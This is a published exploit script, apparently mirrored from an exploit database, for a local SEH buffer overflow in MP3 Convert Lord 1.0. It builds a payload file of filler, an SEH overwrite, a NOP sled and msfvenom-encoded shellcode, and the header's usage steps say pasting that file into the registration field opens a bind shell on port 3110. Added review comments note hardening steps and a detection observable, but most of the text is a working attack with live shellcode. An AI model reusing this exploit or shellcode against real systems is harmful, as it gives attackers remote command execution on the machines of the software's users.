## https://sploitus.com/exploit?id=1337DAY-ID-38156
# Exploit Title: MP3 Convert Lord V1.0 Local Seh Exploit
# Date: 06.01.2023
# Vendor Homepage: http://www.avlord.com/
# Software Link:   https://www.softpedia.com/dyn-postdownload.php/baa965c6b5d22d62987a4638f33d5ec1/63b86eb2/3ecb/4/2
# Exploit Author: Achilles
# Tested Version: 1.0
# Tested on: Windows 7 x64

# 1.- Run python code : MP3 Convert Lord.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open MP3 Convert Lord and press HELP and REGISTRATION
# 4.- Paste the Content of EVIL.txt into the 'Username and Registrationcode Field'
# 5.- Click 'OK' and you will have a bind shell on port 3110.

#!/usr/bin/env python

import struct

# Payload layout for the SEH-overwrite proof of concept described in the header.
# These are Python 2 byte strings (the script uses Python 2 print statements below).
# NOTE(review): the 572-byte filler presumably spans the distance from the start of
# the registration field's buffer to the exception-handler record on the tested
# system (Windows 7 x64) - confirm in a debugger when triaging.
buffer = "\x41" * 572
# Four bytes that land on the "next SEH" slot; per the author's note they decode
# as a short jump of 6 bytes.
nseh = "\xeb\x06\x90\x90" #jmp short 6
# Little-endian 32-bit value that lands on the handler slot; the author attributes
# the address to DLL_LORDM.dll, a module shipped with the application.
# NOTE(review): a hard-coded in-module address only works if that module loads at a
# predictable base and is not covered by SafeSEH/SEHOP - verify on the binary.
# Building the module with /SAFESEH and /DYNAMICBASE and enabling SEHOP are the
# relevant hardening steps, alongside a length check on the registration fields.
seh  =  struct.pack('<L',0x10016e37) #DLL_LORDM.dll
# 20 bytes of 0x90 placed between the overwritten record and the shellcode.
nops =  "\x90" * 20

# Encoded payload bytes. According to the author's note below they were generated
# with msfvenom as a Windows x86 TCP bind shell on port 3110, encoded with
# shikata_ga_nai and avoiding the bytes 0x00, 0x0a and 0x0d.
# Detection note: per the header, a successful run leaves the application with a
# listener on TCP port 3110, so an unexpected listening socket owned by the
# MP3 Convert Lord process is the observable to alert on.
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xb8\x42\xb3\x74\xbc\xdb\xde\xd9\x74\x24\xf4\x5a\x2b"
"\xc9\xb1\x53\x31\x42\x12\x03\x42\x12\x83\xa8\x4f\x96"
"\x49\xd0\x58\xd5\xb2\x28\x99\xba\x3b\xcd\xa8\xfa\x58"
"\x86\x9b\xca\x2b\xca\x17\xa0\x7e\xfe\xac\xc4\x56\xf1"
"\x05\x62\x81\x3c\x95\xdf\xf1\x5f\x15\x22\x26\xbf\x24"
"\xed\x3b\xbe\x61\x10\xb1\x92\x3a\x5e\x64\x02\x4e\x2a"
"\xb5\xa9\x1c\xba\xbd\x4e\xd4\xbd\xec\xc1\x6e\xe4\x2e"
"\xe0\xa3\x9c\x66\xfa\xa0\x99\x31\x71\x12\x55\xc0\x53"
"\x6a\x96\x6f\x9a\x42\x65\x71\xdb\x65\x96\x04\x15\x96"
"\x2b\x1f\xe2\xe4\xf7\xaa\xf0\x4f\x73\x0c\xdc\x6e\x50"
"\xcb\x97\x7d\x1d\x9f\xff\x61\xa0\x4c\x74\x9d\x29\x73"
"\x5a\x17\x69\x50\x7e\x73\x29\xf9\x27\xd9\x9c\x06\x37"
"\x82\x41\xa3\x3c\x2f\x95\xde\x1f\x38\x5a\xd3\x9f\xb8"
"\xf4\x64\xec\x8a\x5b\xdf\x7a\xa7\x14\xf9\x7d\xc8\x0e"
"\xbd\x11\x37\xb1\xbe\x38\xfc\xe5\xee\x52\xd5\x85\x64"
"\xa2\xda\x53\x10\xaa\x7d\x0c\x07\x57\x3d\xfc\x87\xf7"
"\xd6\x16\x08\x28\xc6\x18\xc2\x41\x6f\xe5\xed\x61\x56"
"\x60\x0b\x13\x86\x24\x83\x8b\x64\x13\x1c\x2c\x96\x71"
"\x34\xda\xdf\x93\x83\xe5\xdf\xb1\xa3\x71\x54\xd6\x77"
"\x60\x6b\xf3\xdf\xf5\xfc\x89\xb1\xb4\x9d\x8e\x9b\x2e"
"\x3d\x1c\x40\xae\x48\x3d\xdf\xf9\x1d\xf3\x16\x6f\xb0"
"\xaa\x80\x8d\x49\x2a\xea\x15\x96\x8f\xf5\x94\x5b\xab"
"\xd1\x86\xa5\x34\x5e\xf2\x79\x63\x08\xac\x3f\xdd\xfa"
"\x06\x96\xb2\x54\xce\x6f\xf9\x66\x88\x6f\xd4\x10\x74"
"\xc1\x81\x64\x8b\xee\x45\x61\xf4\x12\xf6\x8e\x2f\x97"
"\x06\xc5\x6d\xbe\x8e\x80\xe4\x82\xd2\x32\xd3\xc1\xea"
"\xb0\xd1\xb9\x08\xa8\x90\xbc\x55\x6e\x49\xcd\xc6\x1b"
"\x6d\x62\xe6\x09")
# Trailing filler of "B" characters sized so that the whole string is 8000 bytes long.
pad ="B" * (8000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
# Final string, in the order the pieces are meant to sit in memory:
# filler, next-SEH bytes, handler address, NOPs, shellcode, trailing pad.
payload = buffer + nseh + seh + nops + shellcode + pad

# Write the assembled string to "Evil.txt" in the current working directory and
# report its length. The usage steps in the header refer to the file as EVIL.txt.
# Python 2 only: the print statements below are not valid Python 3 syntax.
# NOTE(review): the bare except reports every error as "File cannot be created",
# including ones unrelated to file creation, and the handle is not closed if
# write() raises.
try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(payload)
	f.write(payload)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"